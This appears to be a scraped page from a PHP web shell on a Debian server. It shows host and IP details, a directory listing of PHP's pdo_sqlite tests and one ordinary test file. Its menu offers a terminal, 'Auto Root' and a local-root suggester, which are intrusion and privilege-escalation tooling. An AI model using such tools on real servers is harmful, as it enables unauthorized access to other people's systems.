Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.119
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
php-7.4.33 /
ext /
pdo_sqlite /
tests /
Delete
Unzip
Name
Size
Permission
Date
Action
bug33841.phpt
690
B
-rw-rw-r--
2022-10-31 11:36
bug35336.phpt
570
B
-rw-rw-r--
2022-10-31 11:36
bug43831.phpt
1.02
KB
-rw-rw-r--
2022-10-31 11:36
bug44327_2.phpt
1007
B
-rw-rw-r--
2022-10-31 11:36
bug44327_3.phpt
616
B
-rw-rw-r--
2022-10-31 11:36
bug46139.phpt
1004
B
-rw-rw-r--
2022-10-31 11:36
bug46542.phpt
392
B
-rw-rw-r--
2022-10-31 11:36
bug48773.phpt
804
B
-rw-rw-r--
2022-10-31 11:36
bug50728.phpt
307
B
-rw-rw-r--
2022-10-31 11:36
bug52487.phpt
422
B
-rw-rw-r--
2022-10-31 11:36
bug60104.phpt
381
B
-rw-rw-r--
2022-10-31 11:36
bug66033.phpt
746
B
-rw-rw-r--
2022-10-31 11:36
bug70221.phpt
562
B
-rw-rw-r--
2022-10-31 11:36
bug70862.phpt
895
B
-rw-rw-r--
2022-10-31 11:36
bug78192.phpt
1.05
KB
-rw-rw-r--
2022-10-31 11:36
bug79664.phpt
582
B
-rw-rw-r--
2022-10-31 11:36
bug_42589.phpt
677
B
-rw-rw-r--
2022-10-31 11:36
bug_63916-2.phpt
790
B
-rw-rw-r--
2022-10-31 11:36
bug_63916.phpt
768
B
-rw-rw-r--
2022-10-31 11:36
bug_64705.phpt
415
B
-rw-rw-r--
2022-10-31 11:36
common.phpt
221
B
-rw-rw-r--
2022-10-31 11:36
debugdumpparams_001.phpt
619
B
-rw-rw-r--
2022-10-31 11:36
pdo_fetch_func_001.phpt
3.35
KB
-rw-rw-r--
2022-10-31 11:36
pdo_sqlite_createaggregate.phpt
710
B
-rw-rw-r--
2022-10-31 11:36
pdo_sqlite_createaggregate_002.phpt
489
B
-rw-rw-r--
2022-10-31 11:36
pdo_sqlite_createcollation.phpt
907
B
-rw-rw-r--
2022-10-31 11:36
pdo_sqlite_createfunction.phpt
759
B
-rw-rw-r--
2022-10-31 11:36
pdo_sqlite_createfunction_002.phpt
434
B
-rw-rw-r--
2022-10-31 11:36
pdo_sqlite_createfunction_with_flags.phpt
881
B
-rw-rw-r--
2022-10-31 11:36
pdo_sqlite_extendederror_attr.phpt
2.31
KB
-rw-rw-r--
2022-10-31 11:36
pdo_sqlite_get_attribute.phpt
337
B
-rw-rw-r--
2022-10-31 11:36
pdo_sqlite_lastinsertid.phpt
679
B
-rw-rw-r--
2022-10-31 11:36
pdo_sqlite_open_flags.phpt
934
B
-rw-rw-r--
2022-10-31 11:36
pdo_sqlite_statement_getattribute.phpt
447
B
-rw-rw-r--
2022-10-31 11:36
pdo_sqlite_tostring_exception.phpt
868
B
-rw-rw-r--
2022-10-31 11:36
pdo_sqlite_transaction.phpt
585
B
-rw-rw-r--
2022-10-31 11:36
Save
Rename
--TEST-- Bug #43831 ($this gets mangled when extending PDO with persistent connection) --SKIPIF-- <?php if (!extension_loaded('pdo_sqlite')) print 'skip not loaded'; ?> --FILE-- <?php class Foo extends PDO { function __construct($dsn) { parent::__construct($dsn, null, null, array(PDO::ATTR_PERSISTENT => true)); } } class Baz extends PDO { function __construct($dsn) { parent::__construct($dsn, null, null, array(PDO::ATTR_PERSISTENT => true)); } } class Bar extends Baz { function quux() { echo get_class($this), "\n"; $foo = new Foo("sqlite::memory:"); echo get_class($this), "\n"; } } $bar = new Bar("sqlite::memory:"); $bar->quux(); class MyPDO extends PDO {} $bar = new PDO("sqlite::memory:", null, null, array(PDO::ATTR_PERSISTENT => true)); $baz = new MyPDO("sqlite::memory:", null, null, array(PDO::ATTR_PERSISTENT => true)); var_dump($bar); unset($bar); var_dump($baz); var_dump($bar); ?> --EXPECTF-- Bar Bar object(PDO)#%d (0) { } object(MyPDO)#%d (0) { } Notice: Undefined variable: bar in %s on line %d NULL